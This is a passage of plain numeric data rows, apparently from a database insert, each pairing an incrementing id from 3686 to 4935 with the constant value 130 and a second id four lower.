(3686, 130, 3682),
(3687, 130, 3683),
(3688, 130, 3684),
(3689, 130, 3685),
(3690, 130, 3686),
(3691, 130, 3687),
(3692, 130, 3688),
(3693, 130, 3689),
(3694, 130, 3690),
(3695, 130, 3691),
(3696, 130, 3692),
(3697, 130, 3693),
(3698, 130, 3694),
(3699, 130, 3695),
(3700, 130, 3696),
(3701, 130, 3697),
(3702, 130, 3698),
(3703, 130, 3699),
(3704, 130, 3700),
(3705, 130, 3701),
(3706, 130, 3702),
(3707, 130, 3703),
(3708, 130, 3704),
(3709, 130, 3705),
(3710, 130, 3706),
(3711, 130, 3707),
(3712, 130, 3708),
(3713, 130, 3709),
(3714, 130, 3710),
(3715, 130, 3711),
(3716, 130, 3712),
(3717, 130, 3713),
(3718, 130, 3714),
(3719, 130, 3715),
(3720, 130, 3716),
(3721, 130, 3717),
(3722, 130, 3718),
(3723, 130, 3719),
(3724, 130, 3720),
(3725, 130, 3721),
(3726, 130, 3722),
(3727, 130, 3723),
(3728, 130, 3724),
(3729, 130, 3725),
(3730, 130, 3726),
(3731, 130, 3727),
(3732, 130, 3728),
(3733, 130, 3729),
(3734, 130, 3730),
(3735, 130, 3731),
(3736, 130, 3732),
(3737, 130, 3733),
(3738, 130, 3734),
(3739, 130, 3735),
(3740, 130, 3736),
(3741, 130, 3737),
(3742, 130, 3738),
(3743, 130, 3739),
(3744, 130, 3740),
(3745, 130, 3741),
(3746, 130, 3742),
(3747, 130, 3743),
(3748, 130, 3744),
(3749, 130, 3745),
(3750, 130, 3746),
(3751, 130, 3747),
(3752, 130, 3748),
(3753, 130, 3749),
(3754, 130, 3750),
(3755, 130, 3751),
(3756, 130, 3752),
(3757, 130, 3753),
(3758, 130, 3754),
(3759, 130, 3755),
(3760, 130, 3756),
(3761, 130, 3757),
(3762, 130, 3758),
(3763, 130, 3759),
(3764, 130, 3760),
(3765, 130, 3761),
(3766, 130, 3762),
(3767, 130, 3763),
(3768, 130, 3764),
(3769, 130, 3765),
(3770, 130, 3766),
(3771, 130, 3767),
(3772, 130, 3768),
(3773, 130, 3769),
(3774, 130, 3770),
(3775, 130, 3771),
(3776, 130, 3772),
(3777, 130, 3773),
(3778, 130, 3774),
(3779, 130, 3775),
(3780, 130, 3776),
(3781, 130, 3777),
(3782, 130, 3778),
(3783, 130, 3779),
(3784, 130, 3780),
(3785, 130, 3781),
(3786, 130, 3782),
(3787, 130, 3783),
(3788, 130, 3784),
(3789, 130, 3785),
(3790, 130, 3786),
(3791, 130, 3787),
(3792, 130, 3788),
(3793, 130, 3789),
(3794, 130, 3790),
(3795, 130, 3791),
(3796, 130, 3792),
(3797, 130, 3793),
(3798, 130, 3794),
(3799, 130, 3795),
(3800, 130, 3796),
(3801, 130, 3797),
(3802, 130, 3798),
(3803, 130, 3799),
(3804, 130, 3800),
(3805, 130, 3801),
(3806, 130, 3802),
(3807, 130, 3803),
(3808, 130, 3804),
(3809, 130, 3805),
(3810, 130, 3806),
(3811, 130, 3807),
(3812, 130, 3808),
(3813, 130, 3809),
(3814, 130, 3810),
(3815, 130, 3811),
(3816, 130, 3812),
(3817, 130, 3813),
(3818, 130, 3814),
(3819, 130, 3815),
(3820, 130, 3816),
(3821, 130, 3817),
(3822, 130, 3818),
(3823, 130, 3819),
(3824, 130, 3820),
(3825, 130, 3821),
(3826, 130, 3822),
(3827, 130, 3823),
(3828, 130, 3824),
(3829, 130, 3825),
(3830, 130, 3826),
(3831, 130, 3827),
(3832, 130, 3828),
(3833, 130, 3829),
(3834, 130, 3830),
(3835, 130, 3831),
(3836, 130, 3832),
(3837, 130, 3833),
(3838, 130, 3834),
(3839, 130, 3835),
(3840, 130, 3836),
(3841, 130, 3837),
(3842, 130, 3838),
(3843, 130, 3839),
(3844, 130, 3840),
(3845, 130, 3841),
(3846, 130, 3842),
(3847, 130, 3843),
(3848, 130, 3844),
(3849, 130, 3845),
(3850, 130, 3846),
(3851, 130, 3847),
(3852, 130, 3848),
(3853, 130, 3849),
(3854, 130, 3850),
(3855, 130, 3851),
(3856, 130, 3852),
(3857, 130, 3853),
(3858, 130, 3854),
(3859, 130, 3855),
(3860, 130, 3856),
(3861, 130, 3857),
(3862, 130, 3858),
(3863, 130, 3859),
(3864, 130, 3860),
(3865, 130, 3861),
(3866, 130, 3862),
(3867, 130, 3863),
(3868, 130, 3864),
(3869, 130, 3865),
(3870, 130, 3866),
(3871, 130, 3867),
(3872, 130, 3868),
(3873, 130, 3869),
(3874, 130, 3870),
(3875, 130, 3871),
(3876, 130, 3872),
(3877, 130, 3873),
(3878, 130, 3874),
(3879, 130, 3875),
(3880, 130, 3876),
(3881, 130, 3877),
(3882, 130, 3878),
(3883, 130, 3879),
(3884, 130, 3880),
(3885, 130, 3881),
(3886, 130, 3882),
(3887, 130, 3883),
(3888, 130, 3884),
(3889, 130, 3885),
(3890, 130, 3886),
(3891, 130, 3887),
(3892, 130, 3888),
(3893, 130, 3889),
(3894, 130, 3890),
(3895, 130, 3891),
(3896, 130, 3892),
(3897, 130, 3893),
(3898, 130, 3894),
(3899, 130, 3895),
(3900, 130, 3896),
(3901, 130, 3897),
(3902, 130, 3898),
(3903, 130, 3899),
(3904, 130, 3900),
(3905, 130, 3901),
(3906, 130, 3902),
(3907, 130, 3903),
(3908, 130, 3904),
(3909, 130, 3905),
(3910, 130, 3906),
(3911, 130, 3907),
(3912, 130, 3908),
(3913, 130, 3909),
(3914, 130, 3910),
(3915, 130, 3911),
(3916, 130, 3912),
(3917, 130, 3913),
(3918, 130, 3914),
(3919, 130, 3915),
(3920, 130, 3916),
(3921, 130, 3917),
(3922, 130, 3918),
(3923, 130, 3919),
(3924, 130, 3920),
(3925, 130, 3921),
(3926, 130, 3922),
(3927, 130, 3923),
(3928, 130, 3924),
(3929, 130, 3925),
(3930, 130, 3926),
(3931, 130, 3927),
(3932, 130, 3928),
(3933, 130, 3929),
(3934, 130, 3930),
(3935, 130, 3931),
(3936, 130, 3932),
(3937, 130, 3933),
(3938, 130, 3934),
(3939, 130, 3935),
(3940, 130, 3936),
(3941, 130, 3937),
(3942, 130, 3938),
(3943, 130, 3939),
(3944, 130, 3940),
(3945, 130, 3941),
(3946, 130, 3942),
(3947, 130, 3943),
(3948, 130, 3944),
(3949, 130, 3945),
(3950, 130, 3946),
(3951, 130, 3947),
(3952, 130, 3948),
(3953, 130, 3949),
(3954, 130, 3950),
(3955, 130, 3951),
(3956, 130, 3952),
(3957, 130, 3953),
(3958, 130, 3954),
(3959, 130, 3955),
(3960, 130, 3956),
(3961, 130, 3957),
(3962, 130, 3958),
(3963, 130, 3959),
(3964, 130, 3960),
(3965, 130, 3961),
(3966, 130, 3962),
(3967, 130, 3963),
(3968, 130, 3964),
(3969, 130, 3965),
(3970, 130, 3966),
(3971, 130, 3967),
(3972, 130, 3968),
(3973, 130, 3969),
(3974, 130, 3970),
(3975, 130, 3971),
(3976, 130, 3972),
(3977, 130, 3973),
(3978, 130, 3974),
(3979, 130, 3975),
(3980, 130, 3976),
(3981, 130, 3977),
(3982, 130, 3978),
(3983, 130, 3979),
(3984, 130, 3980),
(3985, 130, 3981),
(3986, 130, 3982),
(3987, 130, 3983),
(3988, 130, 3984),
(3989, 130, 3985),
(3990, 130, 3986),
(3991, 130, 3987),
(3992, 130, 3988),
(3993, 130, 3989),
(3994, 130, 3990),
(3995, 130, 3991),
(3996, 130, 3992),
(3997, 130, 3993),
(3998, 130, 3994),
(3999, 130, 3995),
(4000, 130, 3996),
(4001, 130, 3997),
(4002, 130, 3998),
(4003, 130, 3999),
(4004, 130, 4000),
(4005, 130, 4001),
(4006, 130, 4002),
(4007, 130, 4003),
(4008, 130, 4004),
(4009, 130, 4005),
(4010, 130, 4006),
(4011, 130, 4007),
(4012, 130, 4008),
(4013, 130, 4009),
(4014, 130, 4010),
(4015, 130, 4011),
(4016, 130, 4012),
(4017, 130, 4013),
(4018, 130, 4014),
(4019, 130, 4015),
(4020, 130, 4016),
(4021, 130, 4017),
(4022, 130, 4018),
(4023, 130, 4019),
(4024, 130, 4020),
(4025, 130, 4021),
(4026, 130, 4022),
(4027, 130, 4023),
(4028, 130, 4024),
(4029, 130, 4025),
(4030, 130, 4026),
(4031, 130, 4027),
(4032, 130, 4028),
(4033, 130, 4029),
(4034, 130, 4030),
(4035, 130, 4031),
(4036, 130, 4032),
(4037, 130, 4033),
(4038, 130, 4034),
(4039, 130, 4035),
(4040, 130, 4036),
(4041, 130, 4037),
(4042, 130, 4038),
(4043, 130, 4039),
(4044, 130, 4040),
(4045, 130, 4041),
(4046, 130, 4042),
(4047, 130, 4043),
(4048, 130, 4044),
(4049, 130, 4045),
(4050, 130, 4046),
(4051, 130, 4047),
(4052, 130, 4048),
(4053, 130, 4049),
(4054, 130, 4050),
(4055, 130, 4051),
(4056, 130, 4052),
(4057, 130, 4053),
(4058, 130, 4054),
(4059, 130, 4055),
(4060, 130, 4056),
(4061, 130, 4057),
(4062, 130, 4058),
(4063, 130, 4059),
(4064, 130, 4060),
(4065, 130, 4061),
(4066, 130, 4062),
(4067, 130, 4063),
(4068, 130, 4064),
(4069, 130, 4065),
(4070, 130, 4066),
(4071, 130, 4067),
(4072, 130, 4068),
(4073, 130, 4069),
(4074, 130, 4070),
(4075, 130, 4071),
(4076, 130, 4072),
(4077, 130, 4073),
(4078, 130, 4074),
(4079, 130, 4075),
(4080, 130, 4076),
(4081, 130, 4077),
(4082, 130, 4078),
(4083, 130, 4079),
(4084, 130, 4080),
(4085, 130, 4081),
(4086, 130, 4082),
(4087, 130, 4083),
(4088, 130, 4084),
(4089, 130, 4085),
(4090, 130, 4086),
(4091, 130, 4087),
(4092, 130, 4088),
(4093, 130, 4089),
(4094, 130, 4090),
(4095, 130, 4091),
(4096, 130, 4092),
(4097, 130, 4093),
(4098, 130, 4094),
(4099, 130, 4095),
(4100, 130, 4096),
(4101, 130, 4097),
(4102, 130, 4098),
(4103, 130, 4099),
(4104, 130, 4100),
(4105, 130, 4101),
(4106, 130, 4102),
(4107, 130, 4103),
(4108, 130, 4104),
(4109, 130, 4105),
(4110, 130, 4106),
(4111, 130, 4107),
(4112, 130, 4108),
(4113, 130, 4109),
(4114, 130, 4110),
(4115, 130, 4111),
(4116, 130, 4112),
(4117, 130, 4113),
(4118, 130, 4114),
(4119, 130, 4115),
(4120, 130, 4116),
(4121, 130, 4117),
(4122, 130, 4118),
(4123, 130, 4119),
(4124, 130, 4120),
(4125, 130, 4121),
(4126, 130, 4122),
(4127, 130, 4123),
(4128, 130, 4124),
(4129, 130, 4125),
(4130, 130, 4126),
(4131, 130, 4127),
(4132, 130, 4128),
(4133, 130, 4129),
(4134, 130, 4130),
(4135, 130, 4131),
(4136, 130, 4132),
(4137, 130, 4133),
(4138, 130, 4134),
(4139, 130, 4135),
(4140, 130, 4136),
(4141, 130, 4137),
(4142, 130, 4138),
(4143, 130, 4139),
(4144, 130, 4140),
(4145, 130, 4141),
(4146, 130, 4142),
(4147, 130, 4143),
(4148, 130, 4144),
(4149, 130, 4145),
(4150, 130, 4146),
(4151, 130, 4147),
(4152, 130, 4148),
(4153, 130, 4149),
(4154, 130, 4150),
(4155, 130, 4151),
(4156, 130, 4152),
(4157, 130, 4153),
(4158, 130, 4154),
(4159, 130, 4155),
(4160, 130, 4156),
(4161, 130, 4157),
(4162, 130, 4158),
(4163, 130, 4159),
(4164, 130, 4160),
(4165, 130, 4161),
(4166, 130, 4162),
(4167, 130, 4163),
(4168, 130, 4164),
(4169, 130, 4165),
(4170, 130, 4166),
(4171, 130, 4167),
(4172, 130, 4168),
(4173, 130, 4169),
(4174, 130, 4170),
(4175, 130, 4171),
(4176, 130, 4172),
(4177, 130, 4173),
(4178, 130, 4174),
(4179, 130, 4175),
(4180, 130, 4176),
(4181, 130, 4177),
(4182, 130, 4178),
(4183, 130, 4179),
(4184, 130, 4180),
(4185, 130, 4181),
(4186, 130, 4182),
(4187, 130, 4183),
(4188, 130, 4184),
(4189, 130, 4185),
(4190, 130, 4186),
(4191, 130, 4187),
(4192, 130, 4188),
(4193, 130, 4189),
(4194, 130, 4190),
(4195, 130, 4191),
(4196, 130, 4192),
(4197, 130, 4193),
(4198, 130, 4194),
(4199, 130, 4195),
(4200, 130, 4196),
(4201, 130, 4197),
(4202, 130, 4198),
(4203, 130, 4199),
(4204, 130, 4200),
(4205, 130, 4201),
(4206, 130, 4202),
(4207, 130, 4203),
(4208, 130, 4204),
(4209, 130, 4205),
(4210, 130, 4206),
(4211, 130, 4207),
(4212, 130, 4208),
(4213, 130, 4209),
(4214, 130, 4210),
(4215, 130, 4211),
(4216, 130, 4212),
(4217, 130, 4213),
(4218, 130, 4214),
(4219, 130, 4215),
(4220, 130, 4216),
(4221, 130, 4217),
(4222, 130, 4218),
(4223, 130, 4219),
(4224, 130, 4220),
(4225, 130, 4221),
(4226, 130, 4222),
(4227, 130, 4223),
(4228, 130, 4224),
(4229, 130, 4225),
(4230, 130, 4226),
(4231, 130, 4227),
(4232, 130, 4228),
(4233, 130, 4229),
(4234, 130, 4230),
(4235, 130, 4231),
(4236, 130, 4232),
(4237, 130, 4233),
(4238, 130, 4234),
(4239, 130, 4235),
(4240, 130, 4236),
(4241, 130, 4237),
(4242, 130, 4238),
(4243, 130, 4239),
(4244, 130, 4240),
(4245, 130, 4241),
(4246, 130, 4242),
(4247, 130, 4243),
(4248, 130, 4244),
(4249, 130, 4245),
(4250, 130, 4246),
(4251, 130, 4247),
(4252, 130, 4248),
(4253, 130, 4249),
(4254, 130, 4250),
(4255, 130, 4251),
(4256, 130, 4252),
(4257, 130, 4253),
(4258, 130, 4254),
(4259, 130, 4255),
(4260, 130, 4256),
(4261, 130, 4257),
(4262, 130, 4258),
(4263, 130, 4259),
(4264, 130, 4260),
(4265, 130, 4261),
(4266, 130, 4262),
(4267, 130, 4263),
(4268, 130, 4264),
(4269, 130, 4265),
(4270, 130, 4266),
(4271, 130, 4267),
(4272, 130, 4268),
(4273, 130, 4269),
(4274, 130, 4270),
(4275, 130, 4271),
(4276, 130, 4272),
(4277, 130, 4273),
(4278, 130, 4274),
(4279, 130, 4275),
(4280, 130, 4276),
(4281, 130, 4277),
(4282, 130, 4278),
(4283, 130, 4279),
(4284, 130, 4280),
(4285, 130, 4281),
(4286, 130, 4282),
(4287, 130, 4283),
(4288, 130, 4284),
(4289, 130, 4285),
(4290, 130, 4286),
(4291, 130, 4287),
(4292, 130, 4288),
(4293, 130, 4289),
(4294, 130, 4290),
(4295, 130, 4291),
(4296, 130, 4292),
(4297, 130, 4293),
(4298, 130, 4294),
(4299, 130, 4295),
(4300, 130, 4296),
(4301, 130, 4297),
(4302, 130, 4298),
(4303, 130, 4299),
(4304, 130, 4300),
(4305, 130, 4301),
(4306, 130, 4302),
(4307, 130, 4303),
(4308, 130, 4304),
(4309, 130, 4305),
(4310, 130, 4306),
(4311, 130, 4307),
(4312, 130, 4308),
(4313, 130, 4309),
(4314, 130, 4310),
(4315, 130, 4311),
(4316, 130, 4312),
(4317, 130, 4313),
(4318, 130, 4314),
(4319, 130, 4315),
(4320, 130, 4316),
(4321, 130, 4317),
(4322, 130, 4318),
(4323, 130, 4319),
(4324, 130, 4320),
(4325, 130, 4321),
(4326, 130, 4322),
(4327, 130, 4323),
(4328, 130, 4324),
(4329, 130, 4325),
(4330, 130, 4326),
(4331, 130, 4327),
(4332, 130, 4328),
(4333, 130, 4329),
(4334, 130, 4330),
(4335, 130, 4331),
(4336, 130, 4332),
(4337, 130, 4333),
(4338, 130, 4334),
(4339, 130, 4335),
(4340, 130, 4336),
(4341, 130, 4337),
(4342, 130, 4338),
(4343, 130, 4339),
(4344, 130, 4340),
(4345, 130, 4341),
(4346, 130, 4342),
(4347, 130, 4343),
(4348, 130, 4344),
(4349, 130, 4345),
(4350, 130, 4346),
(4351, 130, 4347),
(4352, 130, 4348),
(4353, 130, 4349),
(4354, 130, 4350),
(4355, 130, 4351),
(4356, 130, 4352),
(4357, 130, 4353),
(4358, 130, 4354),
(4359, 130, 4355),
(4360, 130, 4356),
(4361, 130, 4357),
(4362, 130, 4358),
(4363, 130, 4359),
(4364, 130, 4360),
(4365, 130, 4361),
(4366, 130, 4362),
(4367, 130, 4363),
(4368, 130, 4364),
(4369, 130, 4365),
(4370, 130, 4366),
(4371, 130, 4367),
(4372, 130, 4368),
(4373, 130, 4369),
(4374, 130, 4370),
(4375, 130, 4371),
(4376, 130, 4372),
(4377, 130, 4373),
(4378, 130, 4374),
(4379, 130, 4375),
(4380, 130, 4376),
(4381, 130, 4377),
(4382, 130, 4378),
(4383, 130, 4379),
(4384, 130, 4380),
(4385, 130, 4381),
(4386, 130, 4382),
(4387, 130, 4383),
(4388, 130, 4384),
(4389, 130, 4385),
(4390, 130, 4386),
(4391, 130, 4387),
(4392, 130, 4388),
(4393, 130, 4389),
(4394, 130, 4390),
(4395, 130, 4391),
(4396, 130, 4392),
(4397, 130, 4393),
(4398, 130, 4394),
(4399, 130, 4395),
(4400, 130, 4396),
(4401, 130, 4397),
(4402, 130, 4398),
(4403, 130, 4399),
(4404, 130, 4400),
(4405, 130, 4401),
(4406, 130, 4402),
(4407, 130, 4403),
(4408, 130, 4404),
(4409, 130, 4405),
(4410, 130, 4406),
(4411, 130, 4407),
(4412, 130, 4408),
(4413, 130, 4409),
(4414, 130, 4410),
(4415, 130, 4411),
(4416, 130, 4412),
(4417, 130, 4413),
(4418, 130, 4414),
(4419, 130, 4415),
(4420, 130, 4416),
(4421, 130, 4417),
(4422, 130, 4418),
(4423, 130, 4419),
(4424, 130, 4420),
(4425, 130, 4421),
(4426, 130, 4422),
(4427, 130, 4423),
(4428, 130, 4424),
(4429, 130, 4425),
(4430, 130, 4426),
(4431, 130, 4427),
(4432, 130, 4428),
(4433, 130, 4429),
(4434, 130, 4430),
(4435, 130, 4431),
(4436, 130, 4432),
(4437, 130, 4433),
(4438, 130, 4434),
(4439, 130, 4435),
(4440, 130, 4436),
(4441, 130, 4437),
(4442, 130, 4438),
(4443, 130, 4439),
(4444, 130, 4440),
(4445, 130, 4441),
(4446, 130, 4442),
(4447, 130, 4443),
(4448, 130, 4444),
(4449, 130, 4445),
(4450, 130, 4446),
(4451, 130, 4447),
(4452, 130, 4448),
(4453, 130, 4449),
(4454, 130, 4450),
(4455, 130, 4451),
(4456, 130, 4452),
(4457, 130, 4453),
(4458, 130, 4454),
(4459, 130, 4455),
(4460, 130, 4456),
(4461, 130, 4457),
(4462, 130, 4458),
(4463, 130, 4459),
(4464, 130, 4460),
(4465, 130, 4461),
(4466, 130, 4462),
(4467, 130, 4463),
(4468, 130, 4464),
(4469, 130, 4465),
(4470, 130, 4466),
(4471, 130, 4467),
(4472, 130, 4468),
(4473, 130, 4469),
(4474, 130, 4470),
(4475, 130, 4471),
(4476, 130, 4472),
(4477, 130, 4473),
(4478, 130, 4474),
(4479, 130, 4475),
(4480, 130, 4476),
(4481, 130, 4477),
(4482, 130, 4478),
(4483, 130, 4479),
(4484, 130, 4480),
(4485, 130, 4481),
(4486, 130, 4482),
(4487, 130, 4483),
(4488, 130, 4484),
(4489, 130, 4485),
(4490, 130, 4486),
(4491, 130, 4487),
(4492, 130, 4488),
(4493, 130, 4489),
(4494, 130, 4490),
(4495, 130, 4491),
(4496, 130, 4492),
(4497, 130, 4493),
(4498, 130, 4494),
(4499, 130, 4495),
(4500, 130, 4496),
(4501, 130, 4497),
(4502, 130, 4498),
(4503, 130, 4499),
(4504, 130, 4500),
(4505, 130, 4501),
(4506, 130, 4502),
(4507, 130, 4503),
(4508, 130, 4504),
(4509, 130, 4505),
(4510, 130, 4506),
(4511, 130, 4507),
(4512, 130, 4508),
(4513, 130, 4509),
(4514, 130, 4510),
(4515, 130, 4511),
(4516, 130, 4512),
(4517, 130, 4513),
(4518, 130, 4514),
(4519, 130, 4515),
(4520, 130, 4516),
(4521, 130, 4517),
(4522, 130, 4518),
(4523, 130, 4519),
(4524, 130, 4520),
(4525, 130, 4521),
(4526, 130, 4522),
(4527, 130, 4523),
(4528, 130, 4524),
(4529, 130, 4525),
(4530, 130, 4526),
(4531, 130, 4527),
(4532, 130, 4528),
(4533, 130, 4529),
(4534, 130, 4530),
(4535, 130, 4531),
(4536, 130, 4532),
(4537, 130, 4533),
(4538, 130, 4534),
(4539, 130, 4535),
(4540, 130, 4536),
(4541, 130, 4537),
(4542, 130, 4538),
(4543, 130, 4539),
(4544, 130, 4540),
(4545, 130, 4541),
(4546, 130, 4542),
(4547, 130, 4543),
(4548, 130, 4544),
(4549, 130, 4545),
(4550, 130, 4546),
(4551, 130, 4547),
(4552, 130, 4548),
(4553, 130, 4549),
(4554, 130, 4550),
(4555, 130, 4551),
(4556, 130, 4552),
(4557, 130, 4553),
(4558, 130, 4554),
(4559, 130, 4555),
(4560, 130, 4556),
(4561, 130, 4557),
(4562, 130, 4558),
(4563, 130, 4559),
(4564, 130, 4560),
(4565, 130, 4561),
(4566, 130, 4562),
(4567, 130, 4563),
(4568, 130, 4564),
(4569, 130, 4565),
(4570, 130, 4566),
(4571, 130, 4567),
(4572, 130, 4568),
(4573, 130, 4569),
(4574, 130, 4570),
(4575, 130, 4571),
(4576, 130, 4572),
(4577, 130, 4573),
(4578, 130, 4574),
(4579, 130, 4575),
(4580, 130, 4576),
(4581, 130, 4577),
(4582, 130, 4578),
(4583, 130, 4579),
(4584, 130, 4580),
(4585, 130, 4581),
(4586, 130, 4582),
(4587, 130, 4583),
(4588, 130, 4584),
(4589, 130, 4585),
(4590, 130, 4586),
(4591, 130, 4587),
(4592, 130, 4588),
(4593, 130, 4589),
(4594, 130, 4590),
(4595, 130, 4591),
(4596, 130, 4592),
(4597, 130, 4593),
(4598, 130, 4594),
(4599, 130, 4595),
(4600, 130, 4596),
(4601, 130, 4597),
(4602, 130, 4598),
(4603, 130, 4599),
(4604, 130, 4600),
(4605, 130, 4601),
(4606, 130, 4602),
(4607, 130, 4603),
(4608, 130, 4604),
(4609, 130, 4605),
(4610, 130, 4606),
(4611, 130, 4607),
(4612, 130, 4608),
(4613, 130, 4609),
(4614, 130, 4610),
(4615, 130, 4611),
(4616, 130, 4612),
(4617, 130, 4613),
(4618, 130, 4614),
(4619, 130, 4615),
(4620, 130, 4616),
(4621, 130, 4617),
(4622, 130, 4618),
(4623, 130, 4619),
(4624, 130, 4620),
(4625, 130, 4621),
(4626, 130, 4622),
(4627, 130, 4623),
(4628, 130, 4624),
(4629, 130, 4625),
(4630, 130, 4626),
(4631, 130, 4627),
(4632, 130, 4628),
(4633, 130, 4629),
(4634, 130, 4630),
(4635, 130, 4631),
(4636, 130, 4632),
(4637, 130, 4633),
(4638, 130, 4634),
(4639, 130, 4635),
(4640, 130, 4636),
(4641, 130, 4637),
(4642, 130, 4638),
(4643, 130, 4639),
(4644, 130, 4640),
(4645, 130, 4641),
(4646, 130, 4642),
(4647, 130, 4643),
(4648, 130, 4644),
(4649, 130, 4645),
(4650, 130, 4646),
(4651, 130, 4647),
(4652, 130, 4648),
(4653, 130, 4649),
(4654, 130, 4650),
(4655, 130, 4651),
(4656, 130, 4652),
(4657, 130, 4653),
(4658, 130, 4654),
(4659, 130, 4655),
(4660, 130, 4656),
(4661, 130, 4657),
(4662, 130, 4658),
(4663, 130, 4659),
(4664, 130, 4660),
(4665, 130, 4661),
(4666, 130, 4662),
(4667, 130, 4663),
(4668, 130, 4664),
(4669, 130, 4665),
(4670, 130, 4666),
(4671, 130, 4667),
(4672, 130, 4668),
(4673, 130, 4669),
(4674, 130, 4670),
(4675, 130, 4671),
(4676, 130, 4672),
(4677, 130, 4673),
(4678, 130, 4674),
(4679, 130, 4675),
(4680, 130, 4676),
(4681, 130, 4677),
(4682, 130, 4678),
(4683, 130, 4679),
(4684, 130, 4680),
(4685, 130, 4681),
(4686, 130, 4682),
(4687, 130, 4683),
(4688, 130, 4684),
(4689, 130, 4685),
(4690, 130, 4686),
(4691, 130, 4687),
(4692, 130, 4688),
(4693, 130, 4689),
(4694, 130, 4690),
(4695, 130, 4691),
(4696, 130, 4692),
(4697, 130, 4693),
(4698, 130, 4694),
(4699, 130, 4695),
(4700, 130, 4696),
(4701, 130, 4697),
(4702, 130, 4698),
(4703, 130, 4699),
(4704, 130, 4700),
(4705, 130, 4701),
(4706, 130, 4702),
(4707, 130, 4703),
(4708, 130, 4704),
(4709, 130, 4705),
(4710, 130, 4706),
(4711, 130, 4707),
(4712, 130, 4708),
(4713, 130, 4709),
(4714, 130, 4710),
(4715, 130, 4711),
(4716, 130, 4712),
(4717, 130, 4713),
(4718, 130, 4714),
(4719, 130, 4715),
(4720, 130, 4716),
(4721, 130, 4717),
(4722, 130, 4718),
(4723, 130, 4719),
(4724, 130, 4720),
(4725, 130, 4721),
(4726, 130, 4722),
(4727, 130, 4723),
(4728, 130, 4724),
(4729, 130, 4725),
(4730, 130, 4726),
(4731, 130, 4727),
(4732, 130, 4728),
(4733, 130, 4729),
(4734, 130, 4730),
(4735, 130, 4731),
(4736, 130, 4732),
(4737, 130, 4733),
(4738, 130, 4734),
(4739, 130, 4735),
(4740, 130, 4736),
(4741, 130, 4737),
(4742, 130, 4738),
(4743, 130, 4739),
(4744, 130, 4740),
(4745, 130, 4741),
(4746, 130, 4742),
(4747, 130, 4743),
(4748, 130, 4744),
(4749, 130, 4745),
(4750, 130, 4746),
(4751, 130, 4747),
(4752, 130, 4748),
(4753, 130, 4749),
(4754, 130, 4750),
(4755, 130, 4751),
(4756, 130, 4752),
(4757, 130, 4753),
(4758, 130, 4754),
(4759, 130, 4755),
(4760, 130, 4756),
(4761, 130, 4757),
(4762, 130, 4758),
(4763, 130, 4759),
(4764, 130, 4760),
(4765, 130, 4761),
(4766, 130, 4762),
(4767, 130, 4763),
(4768, 130, 4764),
(4769, 130, 4765),
(4770, 130, 4766),
(4771, 130, 4767),
(4772, 130, 4768),
(4773, 130, 4769),
(4774, 130, 4770),
(4775, 130, 4771),
(4776, 130, 4772),
(4777, 130, 4773),
(4778, 130, 4774),
(4779, 130, 4775),
(4780, 130, 4776),
(4781, 130, 4777),
(4782, 130, 4778),
(4783, 130, 4779),
(4784, 130, 4780),
(4785, 130, 4781),
(4786, 130, 4782),
(4787, 130, 4783),
(4788, 130, 4784),
(4789, 130, 4785),
(4790, 130, 4786),
(4791, 130, 4787),
(4792, 130, 4788),
(4793, 130, 4789),
(4794, 130, 4790),
(4795, 130, 4791),
(4796, 130, 4792),
(4797, 130, 4793),
(4798, 130, 4794),
(4799, 130, 4795),
(4800, 130, 4796),
(4801, 130, 4797),
(4802, 130, 4798),
(4803, 130, 4799),
(4804, 130, 4800),
(4805, 130, 4801),
(4806, 130, 4802),
(4807, 130, 4803),
(4808, 130, 4804),
(4809, 130, 4805),
(4810, 130, 4806),
(4811, 130, 4807),
(4812, 130, 4808),
(4813, 130, 4809),
(4814, 130, 4810),
(4815, 130, 4811),
(4816, 130, 4812),
(4817, 130, 4813),
(4818, 130, 4814),
(4819, 130, 4815),
(4820, 130, 4816),
(4821, 130, 4817),
(4822, 130, 4818),
(4823, 130, 4819),
(4824, 130, 4820),
(4825, 130, 4821),
(4826, 130, 4822),
(4827, 130, 4823),
(4828, 130, 4824),
(4829, 130, 4825),
(4830, 130, 4826),
(4831, 130, 4827),
(4832, 130, 4828),
(4833, 130, 4829),
(4834, 130, 4830),
(4835, 130, 4831),
(4836, 130, 4832),
(4837, 130, 4833),
(4838, 130, 4834),
(4839, 130, 4835),
(4840, 130, 4836),
(4841, 130, 4837),
(4842, 130, 4838),
(4843, 130, 4839),
(4844, 130, 4840),
(4845, 130, 4841),
(4846, 130, 4842),
(4847, 130, 4843),
(4848, 130, 4844),
(4849, 130, 4845),
(4850, 130, 4846),
(4851, 130, 4847),
(4852, 130, 4848),
(4853, 130, 4849),
(4854, 130, 4850),
(4855, 130, 4851),
(4856, 130, 4852),
(4857, 130, 4853),
(4858, 130, 4854),
(4859, 130, 4855),
(4860, 130, 4856),
(4861, 130, 4857),
(4862, 130, 4858),
(4863, 130, 4859),
(4864, 130, 4860),
(4865, 130, 4861),
(4866, 130, 4862),
(4867, 130, 4863),
(4868, 130, 4864),
(4869, 130, 4865),
(4870, 130, 4866),
(4871, 130, 4867),
(4872, 130, 4868),
(4873, 130, 4869),
(4874, 130, 4870),
(4875, 130, 4871),
(4876, 130, 4872),
(4877, 130, 4873),
(4878, 130, 4874),
(4879, 130, 4875),
(4880, 130, 4876),
(4881, 130, 4877),
(4882, 130, 4878),
(4883, 130, 4879),
(4884, 130, 4880),
(4885, 130, 4881),
(4886, 130, 4882),
(4887, 130, 4883),
(4888, 130, 4884),
(4889, 130, 4885),
(4890, 130, 4886),
(4891, 130, 4887),
(4892, 130, 4888),
(4893, 130, 4889),
(4894, 130, 4890),
(4895, 130, 4891),
(4896, 130, 4892),
(4897, 130, 4893),
(4898, 130, 4894),
(4899, 130, 4895),
(4900, 130, 4896),
(4901, 130, 4897),
(4902, 130, 4898),
(4903, 130, 4899),
(4904, 130, 4900),
(4905, 130, 4901),
(4906, 130, 4902),
(4907, 130, 4903),
(4908, 130, 4904),
(4909, 130, 4905),
(4910, 130, 4906),
(4911, 130, 4907),
(4912, 130, 4908),
(4913, 130, 4909),
(4914, 130, 4910),
(4915, 130, 4911),
(4916, 130, 4912),
(4917, 130, 4913),
(4918, 130, 4914),
(4919, 130, 4915),
(4920, 130, 4916),
(4921, 130, 4917),
(4922, 130, 4918),
(4923, 130, 4919),
(4924, 130, 4920),
(4925, 130, 4921),
(4926, 130, 4922),
(4927, 130, 4923),
(4928, 130, 4924),
(4929, 130, 4925),
(4930, 130, 4926),
(4931, 130, 4927),
(4932, 130, 4928),
(4933, 130, 4929),
(4934, 130, 4930),
(4935, 130, 4931),
